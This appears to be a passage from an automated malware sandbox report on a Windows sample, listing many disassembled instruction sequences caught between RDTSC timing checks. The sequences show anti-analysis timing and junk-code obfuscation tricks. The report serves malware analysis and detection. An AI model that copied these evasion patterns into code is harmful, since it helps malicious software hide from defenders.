                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD2685 second address: BD26E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 mov dword ptr [esp], eax 0x00000009 jo 00007F2A91294719h 0x0000000f mov di, ax 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F2A91294718h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 00000015h 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e pushad 0x0000002f call 00007F2A91294724h 0x00000034 mov ebx, 119D825Fh 0x00000039 pop ebx 0x0000003a mov cl, 25h 0x0000003c popad 0x0000003d mov esi, dword ptr [ebp+122D3CB5h] 0x00000043 push 00000000h 0x00000045 mov esi, dword ptr [ebp+122D39D9h] 0x0000004b xchg eax, ebx 0x0000004c pushad 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD2420 second address: BD2424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD434F second address: BD4369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A91294725h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD4369 second address: BD4373 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2A913FCEA2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD4373 second address: BD4397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F2A91294716h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d je 00007F2A91294722h 0x00000013 jnp 00007F2A91294716h 0x00000019 jl 00007F2A91294716h 0x0000001f push edx 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD858B second address: BD8598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F2A913FCE96h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDA69F second address: BDA6A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDA6A5 second address: BDA6A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD87E0 second address: BD87EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 ja 00007F2A91294716h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDA6A9 second address: BDA6B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD87EE second address: BD8808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2A91294721h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD8808 second address: BD880F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDAE16 second address: BDAEC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A9129471Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov bl, DEh 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov dword ptr [ebp+12456DA7h], edx 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 push 00000000h 0x00000022 push ebp 0x00000023 call 00007F2A91294718h 0x00000028 pop ebp 0x00000029 mov dword ptr [esp+04h], ebp 0x0000002d add dword ptr [esp+04h], 00000015h 0x00000035 inc ebp 0x00000036 push ebp 0x00000037 ret 0x00000038 pop ebp 0x00000039 ret 0x0000003a mov eax, dword ptr [ebp+122D06FDh] 0x00000040 push 00000000h 0x00000042 push ebx 0x00000043 call 00007F2A91294718h 0x00000048 pop ebx 0x00000049 mov dword ptr [esp+04h], ebx 0x0000004d add dword ptr [esp+04h], 00000018h 0x00000055 inc ebx 0x00000056 push ebx 0x00000057 ret 0x00000058 pop ebx 0x00000059 ret 0x0000005a mov edi, dword ptr [ebp+122D3989h] 0x00000060 sub dword ptr [ebp+122D1CAEh], ebx 0x00000066 push FFFFFFFFh 0x00000068 movzx edi, si 0x0000006b nop 0x0000006c js 00007F2A9129473Ch 0x00000072 push eax 0x00000073 push eax 0x00000074 push edx 0x00000075 jnp 00007F2A9129471Ch 0x0000007b push eax 0x0000007c push edx 0x0000007d rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDAEC8 second address: BDAECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDCC88 second address: BDCC8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDCC8C second address: BDCC92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDCC92 second address: BDCC99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDDD41 second address: BDDD8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jns 00007F2A913FCEA0h 0x0000000f nop 0x00000010 call 00007F2A913FCEA7h 0x00000015 mov edi, dword ptr [ebp+122D3AB9h] 0x0000001b pop ebx 0x0000001c push 00000000h 0x0000001e pushad 0x0000001f movsx ebx, si 0x00000022 popad 0x00000023 push 00000000h 0x00000025 or ebx, dword ptr [ebp+122D39B5h] 0x0000002b xchg eax, esi 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDDD8F second address: BDDD93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDDD93 second address: BDDD99 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDDD99 second address: BDDDB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A91294728h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDED13 second address: BDED18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDDEF0 second address: BDDEF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDFCAB second address: BDFCB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDDEF5 second address: BDDF14 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2A91294722h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDFCB1 second address: BDFCC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 pushad 0x00000008 push edi 0x00000009 jns 00007F2A913FCE96h 0x0000000f pop edi 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDFCC4 second address: BDFD38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a call 00007F2A91294718h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], ecx 0x00000014 add dword ptr [esp+04h], 00000019h 0x0000001c inc ecx 0x0000001d push ecx 0x0000001e ret 0x0000001f pop ecx 0x00000020 ret 0x00000021 mov di, 8664h 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ecx 0x0000002c call 00007F2A91294718h 0x00000031 pop ecx 0x00000032 mov dword ptr [esp+04h], ecx 0x00000036 add dword ptr [esp+04h], 0000001Ah 0x0000003e inc ecx 0x0000003f push ecx 0x00000040 ret 0x00000041 pop ecx 0x00000042 ret 0x00000043 mov bl, ch 0x00000045 or ebx, dword ptr [ebp+122D1D10h] 0x0000004b mov di, 0C2Fh 0x0000004f xchg eax, esi 0x00000050 jnc 00007F2A9129471Ah 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 push edi 0x0000005a jbe 00007F2A91294716h 0x00000060 pop edi 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDFE8C second address: BDFF15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push esi 0x00000007 jmp 00007F2A913FCE9Ch 0x0000000c pop esi 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F2A913FCE98h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 push dword ptr fs:[00000000h] 0x0000002f push 00000000h 0x00000031 push esi 0x00000032 call 00007F2A913FCE98h 0x00000037 pop esi 0x00000038 mov dword ptr [esp+04h], esi 0x0000003c add dword ptr [esp+04h], 0000001Dh 0x00000044 inc esi 0x00000045 push esi 0x00000046 ret 0x00000047 pop esi 0x00000048 ret 0x00000049 mov dword ptr fs:[00000000h], esp 0x00000050 pushad 0x00000051 mov edx, dword ptr [ebp+122D3B41h] 0x00000057 add esi, dword ptr [ebp+122D3AADh] 0x0000005d popad 0x0000005e mov eax, dword ptr [ebp+122D0025h] 0x00000064 push FFFFFFFFh 0x00000066 push eax 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a push edx 0x0000006b pop edx 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDFF15 second address: BDFF1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BDFF1A second address: BDFF24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F2A913FCE96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BE1A60 second address: BE1A64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BE29DA second address: BE29E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BE6972 second address: BE6976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BE6976 second address: BE69E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D3854h], edi 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F2A913FCE98h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c add edi, dword ptr [ebp+122D3C11h] 0x00000032 push 00000000h 0x00000034 call 00007F2A913FCE9Eh 0x00000039 pop ebx 0x0000003a push eax 0x0000003b pushad 0x0000003c jns 00007F2A913FCE98h 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F2A913FCEA1h 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BE3C13 second address: BE3C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BE4B61 second address: BE4B89 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2A913FCEA5h 0x00000008 jmp 00007F2A913FCE9Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jbe 00007F2A913FCEA2h 0x00000016 jl 00007F2A913FCE9Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BE3C19 second address: BE3C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2A9129471Ah 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F2A9129471Ch 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BE4B89 second address: BE4C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 nop 0x00000005 mov ebx, 5C088229h 0x0000000a push dword ptr fs:[00000000h] 0x00000011 mov bx, dx 0x00000014 xor ebx, 7928287Ch 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 xor ebx, dword ptr [ebp+122D3972h] 0x00000027 mov eax, dword ptr [ebp+122D11A1h] 0x0000002d push 00000000h 0x0000002f push edx 0x00000030 call 00007F2A913FCE98h 0x00000035 pop edx 0x00000036 mov dword ptr [esp+04h], edx 0x0000003a add dword ptr [esp+04h], 0000001Ah 0x00000042 inc edx 0x00000043 push edx 0x00000044 ret 0x00000045 pop edx 0x00000046 ret 0x00000047 mov dword ptr [ebp+122D38FFh], esi 0x0000004d push FFFFFFFFh 0x0000004f and ebx, dword ptr [ebp+122D3BC1h] 0x00000055 jmp 00007F2A913FCE9Fh 0x0000005a nop 0x0000005b push edx 0x0000005c push ebx 0x0000005d pushad 0x0000005e popad 0x0000005f pop ebx 0x00000060 pop edx 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 push esi 0x00000065 jmp 00007F2A913FCEA4h 0x0000006a pop esi 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BE3C38 second address: BE3C42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F2A91294716h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BE8C4D second address: BE8C5F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnp 00007F2A913FCE96h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BE8C5F second address: BE8C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BE3CEC second address: BE3D0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCEA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BE8C64 second address: BE8C6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BE6C50 second address: BE6C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F2A913FCEAEh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BE8C6A second address: BE8C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BE8C6E second address: BE8C72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BE6C77 second address: BE6C7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BE8ECC second address: BE8ED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BF31F1 second address: BF31F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BF2C1E second address: BF2C28 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2A913FCE9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: B83395 second address: B8339D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BF78F3 second address: BF78F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BF7A2D second address: BF7A47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a jmp 00007F2A9129471Fh 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BF7A47 second address: BF7A73 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F2A913FCEA4h 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jne 00007F2A913FCE96h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BF7A73 second address: BF7A8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A91294723h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BF91C8 second address: BF91CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BF91CE second address: BF91D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BF91D2 second address: BF91D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BFFE5C second address: BFFE62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BFF114 second address: BFF136 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnp 00007F2A913FCE96h 0x00000009 pop eax 0x0000000a jo 00007F2A913FCE9Ch 0x00000010 jg 00007F2A913FCE96h 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jo 00007F2A913FCE96h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BFF136 second address: BFF13A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BFF13A second address: BFF144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BFF144 second address: BFF14C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BFF2AF second address: BFF2B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: BFF2B5 second address: BFF2DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F2A91294724h 0x0000000e jnc 00007F2A91294716h 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: BFF9F1 second address: BFFA0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A913FCEA0h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: BFFA0A second address: BFFA24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A91294726h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: BFFA24 second address: BFFA37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2A913FCE9Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: BFFA37 second address: BFFA46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F2A91294716h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: BFFA46 second address: BFFA4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: B86727 second address: B8674F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F2A91294720h 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F2A9129471Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C07217 second address: C0721D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C0721D second address: C0723B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F2A9129471Ch 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jne 00007F2A91294716h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C0723B second address: C07244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C06DDE second address: C06DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C07DF6 second address: C07E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2A913FCEA2h 0x0000000a jmp 00007F2A913FCEA7h 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
